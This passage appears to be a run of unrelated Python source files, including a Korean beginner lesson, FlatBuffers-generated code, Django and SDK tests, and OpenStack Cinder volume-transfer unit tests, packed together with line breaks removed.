j>(image_in.shape[1])*.5 and j<(image_in.shape[1])*.75: counter2 += 1#right pillar elif j<(image_in.shape[1])*.5 and j>(image_in.shape[1])*.25: counter += 1#left pillar right.append(counter2) left.append(counter) elements = np.array(right) mean = np.mean(elements, axis=0) sd = np.std(elements, axis=0) final_list_right = [x for x in right if (x > mean - 2 * sd)] final_list_right = [x for x in final_list_right if (x < mean + 2 * sd)] elements = np.array(left) mean = np.mean(elements, axis=0) sd = np.std(elements, axis=0) final_list_left = [x for x in left if (x > mean - 2 * sd)] final_list_left = [x for x in final_list_left if (x < mean + 2 * sd)] #print(final_list_left,final_list_right) print(np.mean(final_list_left)*.5,np.mean(final_list_right)*.5) #display visual measurements disp(path,target_size) jinkyukim-me/StudyPython # if문 age = int(input("나이가 어떻게 되세요?")) if age < 19: print("미성년자는 접근할 수 없습니다.") if age >= 19:print("성인입니다.") # 비교연산자 num = int(input("숫자를 입력해주세요 : ")) if num == 3: print("3이다") if num > 5: print("5보다 크다") if num < 5: print("5보다 작다") country = input("둘 중에 하나를 입력하세요(Korea/korea) : ") if country == "Korea": print("한국입니다.") if country == "korea": print("대한민국입니다.") # a보다는 b가 더 큰 문자, 사전의 뒤쪽에 나오는 문자열을 더 큰 것으로 평가 if ("korea" > "japan"): print("한국이 더 크다") if ("korea" < "japan"): print("일본이 더 크다") if ("Korea" < "japan"): print("대소문자의 비교 - 소문자") if ("Korea" > "japan"): print("대소문자의 비교 - 대문자") # 조건문에 비교 연산식 대신 변수를 바로 사용 # 변수 자체가 논리식이 됨 # 숫자 - 참(0이 아닌 숫자) - 거짓(0) # 문자열 - 참(비어 있지 않은 상태) - 거짓("") # 리스트, 튜플, 딕셔너리 - 참(비어 있지 않은 상태) - 거짓(빈 상태) # 변수자체를 논리식에 사용하면 0만 아니면 모두 참 # 1, 2, -1도 참 input_num = int(input("숫자를 적어주세요 : ")) if input_num: # if input_num != 0: 비교 연산식을 적는 것이 명확 print("True") else: print("False") input_string = input("문자를 입력하세요 : ") if input_string: print("입력해주셔서 감사합니다.") else: print("아무것도 입력하지 않으셨네요.") # 논리 연산자 # and 두 조건이 모두 참 # or 두 조건 중 하나라도 참 # nor 조건을 반대로 뒤집는다 a = 3 b = 5 if a == 3 and b == 4: print("and is OK") if a == 3 or b == 4: print("or is OK") a = 7 if a > 5 and a < 10: print("range is OK") if 5 < a < 10: print("range is OK!") ''' https://www.hackerrank.com/challenges/python-loops/problem Task ==== The provided code stub reads and integer, , from STDIN. For all non-negative integers , print . Example ======= The list of non-negative integers that are less than is . Print the square of each number on a separate line. 0 1 4 Input Format ============ The first and only line contains the integer, . Constraints =========== Output Format =========== Print lines, one corresponding to each . Sample Input 0 5 Sample Output 0 0 1 4 9 16 ''' if __name__ == '__main__': n = int(input()) a = [0] * n print(a[0]) for i in range(1, n): a[i] = a[i-1] + ((i-1) << 1) + 1 # i , 1, 2, 3 # 2(i-1)+1 0, 1, 3, 5 # a[i] 0, 1, 4, 9 print(a[i]) VladSerhiienko/FbxPipeline # automatically generated by the FlatBuffers compiler, do not modify # namespace: apemodefb import flatbuffers class TransformLimitsFb(object): __slots__ = ['_tab'] # TransformLimitsFb def Init(self, buf, pos): self._tab = flatbuffers.table.Table(buf, pos) # TransformLimitsFb def TranslationMinActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 0) return obj # TransformLimitsFb def TranslationMaxActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 3) return obj # TransformLimitsFb def RotationMinActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 6) return obj # TransformLimitsFb def RotationMaxActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 9) return obj # TransformLimitsFb def ScalingMinActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 12) return obj # TransformLimitsFb def ScalingMaxActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 15) return obj # TransformLimitsFb def TranslationMin(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 20) return obj # TransformLimitsFb def TranslationMax(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 32) return obj # TransformLimitsFb def RotationMin(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 44) return obj # TransformLimitsFb def RotationMax(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 56) return obj # TransformLimitsFb def ScalingMin(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 68) return obj # TransformLimitsFb def ScalingMax(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 80) return obj def CreateTransformLimitsFb(builder, translation_min_active_x, translation_min_active_y, translation_min_active_z, translation_max_active_x, translation_max_active_y, translation_max_active_z, rotation_min_active_x, rotation_min_active_y, rotation_min_active_z, rotation_max_active_x, rotation_max_active_y, rotation_max_active_z, scaling_min_active_x, scaling_min_active_y, scaling_min_active_z, scaling_max_active_x, scaling_max_active_y, scaling_max_active_z, translation_min_x, translation_min_y, translation_min_z, translation_max_x, translation_max_y, translation_max_z, rotation_min_x, rotation_min_y, rotation_min_z, rotation_max_x, rotation_max_y, rotation_max_z, scaling_min_x, scaling_min_y, scaling_min_z, scaling_max_x, scaling_max_y, scaling_max_z): builder.Prep(4, 92) builder.Prep(4, 12) builder.PrependFloat32(scaling_max_z) builder.PrependFloat32(scaling_max_y) builder.PrependFloat32(scaling_max_x) builder.Prep(4, 12) builder.PrependFloat32(scaling_min_z) builder.PrependFloat32(scaling_min_y) builder.PrependFloat32(scaling_min_x) builder.Prep(4, 12) builder.PrependFloat32(rotation_max_z) builder.PrependFloat32(rotation_max_y) builder.PrependFloat32(rotation_max_x) builder.Prep(4, 12) builder.PrependFloat32(rotation_min_z) builder.PrependFloat32(rotation_min_y) builder.PrependFloat32(rotation_min_x) builder.Prep(4, 12) builder.PrependFloat32(translation_max_z) builder.PrependFloat32(translation_max_y) builder.PrependFloat32(translation_max_x) builder.Prep(4, 12) builder.PrependFloat32(translation_min_z) builder.PrependFloat32(translation_min_y) builder.PrependFloat32(translation_min_x) builder.Pad(2) builder.Prep(1, 3) builder.PrependBool(scaling_max_active_z) builder.PrependBool(scaling_max_active_y) builder.PrependBool(scaling_max_active_x) builder.Prep(1, 3) builder.PrependBool(scaling_min_active_z) builder.PrependBool(scaling_min_active_y) builder.PrependBool(scaling_min_active_x) builder.Prep(1, 3) builder.PrependBool(rotation_max_active_z) builder.PrependBool(rotation_max_active_y) builder.PrependBool(rotation_max_active_x) builder.Prep(1, 3) builder.PrependBool(rotation_min_active_z) builder.PrependBool(rotation_min_active_y) builder.PrependBool(rotation_min_active_x) builder.Prep(1, 3) builder.PrependBool(translation_max_active_z) builder.PrependBool(translation_max_active_y) builder.PrependBool(translation_max_active_x) builder.Prep(1, 3) builder.PrependBool(translation_min_active_z) builder.PrependBool(translation_min_active_y) builder.PrependBool(translation_min_active_x) return builder.Offset() 0 import time from typing import Optional from ._integration_test_case import IntegrationTestCase from accelbyte_py_sdk.api.dsmc.models import ModelsCreateSessionRequest from accelbyte_py_sdk.api.dsmc.models import ModelsRequestMatchMember from accelbyte_py_sdk.api.dsmc.models import ModelsRequestMatchParty from accelbyte_py_sdk.api.dsmc.models import ModelsRequestMatchingAlly class DSMCTestCase(IntegrationTestCase): session_id: Optional[str] = None deployment: str = "deployruli" game_mode: str = "soloyogs" session_namespace: str = "armadademotestqa" session_party_id = "PARTY_ID" session_user_id = "USER_ID" models_create_session_request: Optional[ModelsCreateSessionRequest] = ModelsCreateSessionRequest.create( client_version="", configuration="", deployment=deployment, game_mode=game_mode, matching_allies=[ ModelsRequestMatchingAlly.create( matching_parties=[ ModelsRequestMatchParty.create( party_attributes={}, party_id=session_party_id, party_members=[ModelsRequestMatchMember.create(user_id=session_user_id)] ) ] ) ], namespace=session_namespace, pod_name="", region="", session_id="" ) # noinspection PyMethodMayBeStatic def do_session_browser_create_session(self): # pylint: disable=no-self-use from accelbyte_py_sdk.api.sessionbrowser import create_session from accelbyte_py_sdk.api.sessionbrowser.models import ModelsCreateSessionRequest from accelbyte_py_sdk.api.sessionbrowser.models import ModelsGameSessionSetting current_player: int = 0 max_player: int = 10 models_create_session_request = ModelsCreateSessionRequest.create( game_session_setting=ModelsGameSessionSetting.create( allow_join_in_progress=False, current_internal_player=current_player, current_player=current_player, map_name="map_name", max_internal_player=max_player, max_player=max_player, mode="mode", num_bot=0, password="password", settings={} ), game_version="0.1.0", namespace=self.namespace, session_type="p2p", username="username" ) result, error = create_session(body=models_create_session_request) if error is None: session_id = result.session_id else: session_id = None return result, error, session_id def setUp(self) -> None: super().setUp() _, error, session_id = self.do_session_browser_create_session() if error is not None: self.skipTest(reason=f"Failed to set up SessionBrowser session. {str(error)}") self.session_id = session_id self.models_create_session_request.session_id = self.session_id def afterSetUp(self) -> None: from accelbyte_py_sdk.core import ExponentialHttpBackoffPolicy from accelbyte_py_sdk.core import MaxElapsedHttpRetryPolicy self.set_http_client_policies( retry=MaxElapsedHttpRetryPolicy(60.0), backoff=ExponentialHttpBackoffPolicy() ) def beforeTearDown(self) -> None: self.set_http_client_policies(retry=None, backoff=None) def tearDown(self) -> None: from accelbyte_py_sdk.api.dsmc import delete_session as dsmc_delete_session from accelbyte_py_sdk.api.sessionbrowser import delete_session as sb_delete_session if self.session_id is not None: _, error = dsmc_delete_session(session_id=self.session_id) self.log_warning(msg=f"Failed to tear down DSMC session. {str(error)}", condition=error is not None) _, error = sb_delete_session(session_id=self.session_id) self.log_warning(msg=f"Failed to tear down SessionBrowser session. {str(error)}", condition=error is not None) self.session_id = None super().tearDown() def test_claim_server(self): from accelbyte_py_sdk.api.dsmc import claim_server from accelbyte_py_sdk.api.dsmc import create_session from accelbyte_py_sdk.api.dsmc.models import ModelsClaimSessionRequest from accelbyte_py_sdk.api.dsmc.models import ResponseError # arrange _, error = create_session( body=self.models_create_session_request, namespace=self.models_create_session_request.namespace ) self.log_warning(msg=f"Failed to set up DSMC session. {str(error)}", condition=error is not None) time.sleep(5) # act _, error = claim_server( body=ModelsClaimSessionRequest.create( session_id=self.models_create_session_request.session_id ) ) # assert if ( error is not None and isinstance(error, ResponseError) and "server is not ready" in error.error_message.lower() ): self.skipTest(reason=f"Server is not ready yet.") else: self.assertIsNone(error, error) def test_create_session(self): from accelbyte_py_sdk.api.dsmc import create_session from accelbyte_py_sdk.api.dsmc import delete_session # arrange if self.session_id is not None: _, _ = delete_session(session_id=self.session_id) # act _, error = create_session( body=self.models_create_session_request, namespace=self.models_create_session_request.namespace ) # assert self.assertIsNone(error, error) def test_get_session(self): from accelbyte_py_sdk.api.dsmc import create_session from accelbyte_py_sdk.api.dsmc import get_session # arrange _, error = create_session( body=self.models_create_session_request, namespace=self.models_create_session_request.namespace ) self.log_warning(msg=f"Failed to set up DSMC session. {str(error)}", condition=error is not None) # act _, error = get_session(session_id=self.models_create_session_request.session_id) # assert self.assertIsNone(error, error) Anidwyd/pandroide-svpg import numpy as np import torch as th import os from pathlib import Path def save_algo(algo, directory, algo_version="Independent"): directory = str(directory) + f"{algo.__class__.__name__}-{algo_version}" if not os.path.exists(directory): os.makedirs(directory) rewards = np.array( [[r.cpu() for r in agent_reward] for agent_reward in algo.rewards.values()] ) with open(directory + "/rewards.npy", "wb") as f: np.save(f, rewards) with open(directory + "/eval_timesteps.npy", "wb") as f: np.save(f, np.array(algo.eval_timesteps)) action_path = Path(directory + "/action_agents") critic_path = Path(directory + "/critic_agents") if not os.path.exists(action_path): os.makedirs(action_path) if not os.path.exists(critic_path): os.makedirs(critic_path) for i, (a_agent, c_agent) in enumerate(zip(algo.action_agents, algo.critic_agents)): a_agent.save_model(f"{action_path}/action_agent{i}.pt") c_agent.save_model(f"{critic_path}/critic_agent{i}.pt") def load_algo(directory, device="cpu"): directory = str(directory) with open(directory + "/rewards.npy", "rb") as f: rewards = np.load(f, allow_pickle=True) with open(directory + "/eval_timesteps.npy", "rb") as f: eval_timesteps = np.load(f, allow_pickle=True) action_agents, action_path = [], directory + "/action_agents" critic_agents, critic_path = [], directory + "/critic_agents" for i in range(rewards.shape[0]): action_agent = th.load(f"{action_path}/action_agent{i}.pt").to(device) action_agents.append(action_agent) critic_agent = th.load(f"{critic_path}/critic_agent{i}.pt").to(device) critic_agents.append(critic_agent) return action_agents, critic_agents, rewards, eval_timesteps poradnia/template_mail/tests.py from django.template import TemplateDoesNotExist, TemplateSyntaxError, loader from django.test import TestCase from poradnia.template_mail.utils import TemplateKey, TemplateMailManager class TemplateMailManagerTestCase(TestCase): def assertEmpty(self, obj): obj = list(obj) self.assertEqual(len(obj), 0, "{} is not empty".format(obj)) def _throws_template_error(self, template): try: txt = loader.get_template(template.txt_path) if template.html_path or True: # html_path is optional for now html = loader.get_template(template.html_path) return None except (TemplateDoesNotExist, TemplateSyntaxError) as e: return e def test_all_enums_mapped(self): self.assertEqual(set(TemplateMailManager.TEMPLATE_MAP.keys()), set(TemplateKey)) def test_maps_all_keys_to_valid_templates(self): templates = TemplateMailManager.TEMPLATE_MAP ident_error = { key: self._throws_template_error(value) for key, value in templates.items() } self.assertEmpty({(key, err) for key, err in ident_error.items() if err}) import os import json from dotenv import load_dotenv, find_dotenv from math import log from itertools import chain from gensim.models.ldamodel import LdaModel from gensim.corpora.dictionary import Dictionary from parse_reports import read_sentences from nlp import topic def saliency_index(lda: LdaModel, corpus, words: Dictionary): full_corpus = list(chain(*corpus)) N = len(words) total = sum(words.cfs[i] for i in range(N)) frequencies = [words.cfs[i] / total for i in range(N)] topics = lda.print_topics() relative_likelihood = [0. for _ in range(N)] for topic_id, topic_prob in lda.get_document_topics(full_corpus, minimum_probability=0.): for term, cond_prob in lda.get_topic_terms(topic_id, topn = None): relative_likelihood[term] += cond_prob * log(cond_prob / topic_prob) saliencies = [f * l for f, l in zip(frequencies, relative_likelihood)] return { words[i]: s for i, s in enumerate(saliencies) } if __name__ == '__main__': load_dotenv(find_dotenv()) VERBOSE = os.environ.get("VERBOSE", "False") == "True" SENTENCES = os.environ.get("SENTENCES") companies = {} for sentences, filename in read_sentences(SENTENCES): company, extension = os.path.splitext(filename) VERBOSE and print(f"Working on {company}...") if len(sentences[0]) > 0: lda, corpus, words = topic.get_topics(sentences) saliencies = saliency_index(lda, corpus, words) companies[company] = saliencies else: VERBOSE and print(f"{company} has empty sentences...") VERBOSE and print("Writing results...") with open("data/saliency.json", "w") as outfile: json.dump(companies, outfile) VERBOSE and print("...done!")ChanTerelLy/partnerweb3tickets_handler/admin.py0 from django.contrib import admin from .models import Workers, ACL, AdditionalTicket, Employer, ChiefInstaller, Installer, AUP admin.site.register(Workers) admin.site.register(ACL) admin.site.register(AdditionalTicket) admin.site.register(Employer) admin.site.register(ChiefInstaller) admin.site.register(Installer) admin.site.register(AUP)10-100 # -*- coding: utf-8 -*- """Console script for resector.""" import sys import click from pathlib import Path @click.command() @click.argument('output-path', type=click.Path()) @click.option('--size', '-s', type=int, default=256, show_default=True) @click.option('--noise-offset', '-o', type=float, default=1000, show_default=True) @click.option('--noise-scale', '-s', type=float, default=0.02, show_default=True) @click.option('--min-persistence', '-p', type=float, default=0.01, show_default=True) @click.option('--max-persistence', '-g', type=float, default=0.8, show_default=True) def main( output_path, size, noise_offset, noise_scale, min_persistence, max_persistence, ): import numpy as np import nibabel as nib from tqdm import trange from noise import snoise3 """ Original JavaScript code: let center = createVector(width/2, height/2); let maxd = center.mag(); for (let i = 0; i < height; i++) { for (let j = 0; j < width; j++) { let p = createVector(j, i); let d = dist(p.x, p.y, center.x, center.y); persistence = map(d, 0, maxd, 0.01, 0.6); noiseDetail(octaves, persistence); let noiseVal = noise(noiseOffset + j * noiseScaleX, noiseOffset + i * noiseScaleY); noiseVal -= intensityOffset; noiseVal = constrain(noiseVal, 0, 1); let intensity = map(noiseVal, 0, 1, 0, 255); intensity = constrain(intensity, 0, 255); set(j, i, intensity); } } """ output_size = si, sj, sk = 3 * [size] output = np.empty(output_size, np.float32) center = np.array(output_size) / 2 maxd = np.linalg.norm(center) for i in trange(si): for j in range(sj): for k in range(sk): p = np.array((i, j, k)) d = get_distance(p, center) persistence = map(d, 0, maxd, min_persistence, max_persistence) noise_val = snoise3( noise_offset + k * noise_scale, noise_offset + j * noise_scale, noise_offset + i * noise_scale, octaves=4, persistence=persistence, ) noise_val = (noise_val + 1) / 2 # [0, 1] output[i, j, k] = noise_val affine = np.eye(4) affine[:3, 3] = -center nii = nib.Nifti1Image(output, affine) nii.to_filename(output_path) return 0 def get_distance(a, b): import numpy as np return np.linalg.norm(a - b) def map(n, start1, stop1, start2, stop2): # https://github.com/processing/p5.js/blob/b15ca7c7ac8ba95ccb0123cf74fc163040090e1b/src/math/calculation.js#L450 return (n - start1) / (stop1 - start1) * (stop2 - start2) + start2 if __name__ == "__main__": # pylint: disable=no-value-for-parameter sys.exit(main()) # pragma: no cover import optparse #解析命令行命令的模块 import socketserver from conf import settings #存IP和端口的模块 from core import server #存多线程通信类的模块 #参数处理 class ArgvHandler(): def __init__(self): self.op=optparse.OptionParser() #建立一个解析命令行命令的对象 #获取命令,此处不需要,因为已经在settings文件中设置好了参数 ''' self.op.add_option("-s","--server",dest="server") #获取ip地址 self.op.add_option("-P","--port",dest="port") #获取端口 ''' #参数解析 options,args = self.op.parse_args() #将解析结果赋给两个变量 #输出测试 ''' print(type(options)) #并不是字典,而是一个被封装成了一个对象 #print(options.server) #所以取值应该用属性的方法来取,而不是键值对的方法取 print(options) print(args) ''' self.verify_args(options,args) #验证参数 #验证参数 def verify_args(self,options,args): #将获取的参数传入 cmd = args[0] #获取启动命令 #判断命令是否存在,存在就执行 if hasattr(self,cmd): func = getattr(self,cmd) #如果存在if就通过,然后获取该命令的函数名 func() #执行该命令函数 #在之后无论定义多少个命令函数,都只验证一次就出结果,而不需要像if一样多次验证 #启动就是启动socketserver,开始连接 def start(self): print('the server is working!') s = socketserver.ThreadingTCPServer((settings.IP,settings.PORT),server.ServerHandler) s.serve_forever() #开启多线程通信 def help(self): pass from django import forms from django.contrib.auth.models import User from django.contrib.auth.forms import UserCreationForm, UserChangeForm from django.forms import ModelForm from bootstrap_datepicker_plus import DatePickerInput from crispy_forms.helper import FormHelper from crispy_forms.layout import Submit, Layout, Fieldset, Div from crispy_forms.bootstrap import Field, InlineRadios, TabHolder, Tab from api.models import User, UserProfile class EditProfileForm(ModelForm): class Meta: model = User fields = ('name', 'siape', 'funcao', 'cpf') # fields = ( # 'name', # 'siape', # ) class ProfileForm(ModelForm): class Meta: model = UserProfile fields = ('dtnascimento', 'endereco', 'cidade', 'cep', 'avatar') dtnascimento = forms.DateField( widget=forms.DateInput(format='%d/%m/%Y', attrs={'class': 'datepicker'}), input_formats=('%d/%m/%Y', ) )# Import User_Settings import user_settings as us # Define Constants import constants as cs from griddef import griddef from base import base from cmm_init import cmm_init from integ import integ def CMM_driver(): # Define Grid # test = "running CMM_driver" print("Running griddef...") zu, zw, xu, xs = griddef(us.nz, us.nx, us.dz, us.dx, cs.zu, cs.zw, cs.xu, cs.xs) print("griddef ran") # Initialize the Base State tb, qb, qbs, tbv, pisfc, pib, rhou, rhow, rhb, ub, um, u = base(us.profile_method, us.nx, us.nz, us.dz, us.psurf, us.qsurf, us.q4km, us.ztr, us.temptr, us.ttr, us.tsurf, cs.p0, cs.cp, cs.g, cs.rd, cs.xk, cs.c_v, cs.zu, cs.rhow, cs.rhou, cs.tb, cs.tbv, cs.qb, cs.qbs, cs.rhb, cs.pib, cs.ub, cs.um, cs.u, cs.up) # Set Initial Conditions print("running cmm_init") th, thm, pim, pic, pprt = cmm_init(cs.xs, cs.g, us.nx, us.nz, cs.zu, us.dx, us.dz, us.zcnt, us.xcnt, us.radz, us.radx, cs.trigpi, cs.cp, cs.rhou, cs.tb, cs.qb, us.thermamp, cs.th, cs.thm, cs.pim, cs.pic, cs.pprt, us.bubble_switch) print("cmm_init ran...") # Integrate the Model print("Running integ...") integ(cs.tbv, cs.pib, cs.p0, cs.lv, cs.rd, cs.ub, cs.g, cs.cp, us.c_sound, cs.rhow, cs.rhou, cs.tb, cs.zu, cs.zw, cs.xu, cs.xs, us.x_dist_in, us.latdmpcoef, us.raydmpcoef, us.raydmpz, cs.trigpi, cs.qb, cs.um, cs.u, cs.up, cs.wm, cs.w, cs.wp, cs.thm, cs.th, cs.thp, cs.pim, cs.pic, cs.pip, cs.pprt, cs.qvtot, cs.qvm, cs.qv, cs.qvp, cs.qcm, cs.qc, cs.qcp, cs.qrainm, cs.qrain, cs.qrainp, us.dx, us.dz, us.nt, us.nz, us.nx, us.dt, us.asscoef, us.cmixh, us.cmixv, us.qc0, us.k1, us.k2, cs.thvm, cs.thv, cs.thvp, 'blank', 25) print("integ ran") # Save Model Data to Output File # save (modeloutputpathandfilename) return zu, zw, xu, xs, u, th """typy standard library""" helenwalsh/cinder1-10 # Copyright (c) 2013 OpenStack Foundation # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Unit Tests for volume transfers.""" from unittest import mock from oslo_utils import timeutils from cinder import context from cinder import db from cinder.db.sqlalchemy import api as db_api from cinder.db.sqlalchemy import models from cinder import exception from cinder import objects from cinder import quota from cinder.tests.unit.api.v2 import fakes as v2_fakes from cinder.tests.unit import fake_constants as fake from cinder.tests.unit import test from cinder.tests.unit import utils from cinder.transfer import api as transfer_api QUOTAS = quota.QUOTAS class VolumeTransferTestCase(test.TestCase): """Test cases for volume transfer code.""" def setUp(self): super(VolumeTransferTestCase, self).setUp() self.ctxt = context.RequestContext(user_id=fake.USER_ID, project_id=fake.PROJECT_ID) self.updated_at = timeutils.utcnow() @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_volume_create_delete(self, mock_notify): tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) response = tx_api.create(self.ctxt, volume.id, 'Description') volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual('awaiting-transfer', volume['status'], 'Unexpected state') calls = [mock.call(self.ctxt, mock.ANY, "transfer.create.start"), mock.call(self.ctxt, mock.ANY, "transfer.create.end")] mock_notify.assert_has_calls(calls) self.assertEqual(2, mock_notify.call_count) tx_api.delete(self.ctxt, response['id']) volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual('available', volume['status'], 'Unexpected state') calls = [mock.call(self.ctxt, mock.ANY, "transfer.delete.start"), mock.call(self.ctxt, mock.ANY, "transfer.delete.end")] mock_notify.assert_has_calls(calls) self.assertEqual(4, mock_notify.call_count) def test_transfer_invalid_volume(self): tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, status='in-use', updated_at=self.updated_at) self.assertRaises(exception.InvalidVolume, tx_api.create, self.ctxt, volume.id, 'Description') volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual('in-use', volume['status'], 'Unexpected state') def test_transfer_invalid_encrypted_volume(self): tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) db.volume_update(self.ctxt, volume.id, {'encryption_key_id': fake.ENCRYPTION_KEY_ID}) self.assertRaises(exception.InvalidVolume, tx_api.create, self.ctxt, volume.id, 'Description') @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_invalid_authkey(self, mock_notify): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume.id, 'Description') volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual('awaiting-transfer', volume['status'], 'Unexpected state') self.assertRaises(exception.TransferNotFound, tx_api.accept, self.ctxt, '2', transfer['auth_key']) self.assertRaises(exception.InvalidAuthKey, tx_api.accept, self.ctxt, transfer['id'], 'wrong') @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_invalid_volume(self, mock_notify): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at, volume_type_id=self.vt['id']) transfer = tx_api.create(self.ctxt, volume.id, 'Description') volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual('awaiting-transfer', volume['status'], 'Unexpected state') calls = [mock.call(self.ctxt, mock.ANY, "transfer.create.start"), mock.call(self.ctxt, mock.ANY, "transfer.create.end")] mock_notify.assert_has_calls(calls) self.assertEqual(2, mock_notify.call_count) volume.status = 'wrong' volume.save() self.assertRaises(exception.InvalidVolume, tx_api.accept, self.ctxt, transfer['id'], transfer['auth_key']) volume.status = 'awaiting-transfer' volume.save() # Because the InvalidVolume exception is raised in tx_api, so there is # only transfer.accept.start called and missing transfer.accept.end. calls = [mock.call(self.ctxt, mock.ANY, "transfer.accept.start")] mock_notify.assert_has_calls(calls) self.assertEqual(3, mock_notify.call_count) @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_volume_in_consistencygroup(self, mock_notify): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() consistencygroup = utils.create_consistencygroup(self.ctxt) volume = utils.create_volume(self.ctxt, updated_at=self.updated_at, consistencygroup_id= consistencygroup.id) transfer = tx_api.create(self.ctxt, volume.id, 'Description') self.assertRaises(exception.InvalidVolume, tx_api.accept, self.ctxt, transfer['id'], transfer['auth_key']) @mock.patch.object(QUOTAS, "limit_check") @mock.patch.object(QUOTAS, "reserve") @mock.patch.object(QUOTAS, "add_volume_type_opts") @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept(self, mock_notify, mock_quota_voltype, mock_quota_reserve, mock_quota_limit): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, volume_type_id=fake.VOLUME_TYPE_ID, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume.id, 'Description') self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID response = tx_api.accept(self.ctxt, transfer['id'], transfer['auth_key']) volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual(fake.PROJECT2_ID, volume.project_id) self.assertEqual(fake.USER2_ID, volume.user_id) self.assertEqual(response['volume_id'], volume.id, 'Unexpected volume id in response.') self.assertEqual(response['id'], transfer['id'], 'Unexpected transfer id in response.') calls = [mock.call(self.ctxt, mock.ANY, "transfer.accept.start"), mock.call(self.ctxt, mock.ANY, "transfer.accept.end")] mock_notify.assert_has_calls(calls) # The notify_about_volume_usage is called twice at create(), # and twice at accept(). self.assertEqual(4, mock_notify.call_count) # Check QUOTAS reservation calls # QUOTAS.add_volume_type_opts reserve_opt = {'volumes': 1, 'gigabytes': 1} release_opt = {'volumes': -1, 'gigabytes': -1} calls = [mock.call(self.ctxt, reserve_opt, fake.VOLUME_TYPE_ID), mock.call(self.ctxt, release_opt, fake.VOLUME_TYPE_ID)] mock_quota_voltype.assert_has_calls(calls) # QUOTAS.reserve calls = [mock.call(mock.ANY, **reserve_opt), mock.call(mock.ANY, project_id=fake.PROJECT_ID, **release_opt)] mock_quota_reserve.assert_has_calls(calls) # QUOTAS.limit_check values = {'per_volume_gigabytes': 1} mock_quota_limit.assert_called_once_with(self.ctxt, project_id=fake.PROJECT2_ID, **values) @mock.patch.object(QUOTAS, "reserve") @mock.patch.object(QUOTAS, "add_volume_type_opts") @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_over_quota(self, mock_notify, mock_quota_voltype, mock_quota_reserve): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, volume_type_id=fake.VOLUME_TYPE_ID, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume.id, 'Description') fake_overs = ['volumes_lvmdriver-3'] fake_quotas = {'gigabytes_lvmdriver-3': 1, 'volumes_lvmdriver-3': 10} fake_usages = {'gigabytes_lvmdriver-3': {'reserved': 0, 'in_use': 1}, 'volumes_lvmdriver-3': {'reserved': 0, 'in_use': 1}} mock_quota_reserve.side_effect = exception.OverQuota( overs=fake_overs, quotas=fake_quotas, usages=fake_usages) self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID self.assertRaises(exception.VolumeLimitExceeded, tx_api.accept, self.ctxt, transfer['id'], transfer['auth_key']) # notification of transfer.accept is sent only after quota check # passes self.assertEqual(2, mock_notify.call_count) @mock.patch.object(QUOTAS, "limit_check") @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_over_quota_check_limit(self, mock_notify, mock_quota_limit): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, volume_type_id=fake.VOLUME_TYPE_ID, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume.id, 'Description') fake_overs = ['per_volume_gigabytes'] fake_quotas = {'per_volume_gigabytes': 1} fake_usages = {} mock_quota_limit.side_effect = exception.OverQuota( overs=fake_overs, quotas=fake_quotas, usages=fake_usages) self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID self.assertRaises(exception.VolumeSizeExceedsLimit, tx_api.accept, self.ctxt, transfer['id'], transfer['auth_key']) # notification of transfer.accept is sent only after quota check # passes self.assertEqual(2, mock_notify.call_count) def test_transfer_get(self): tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, 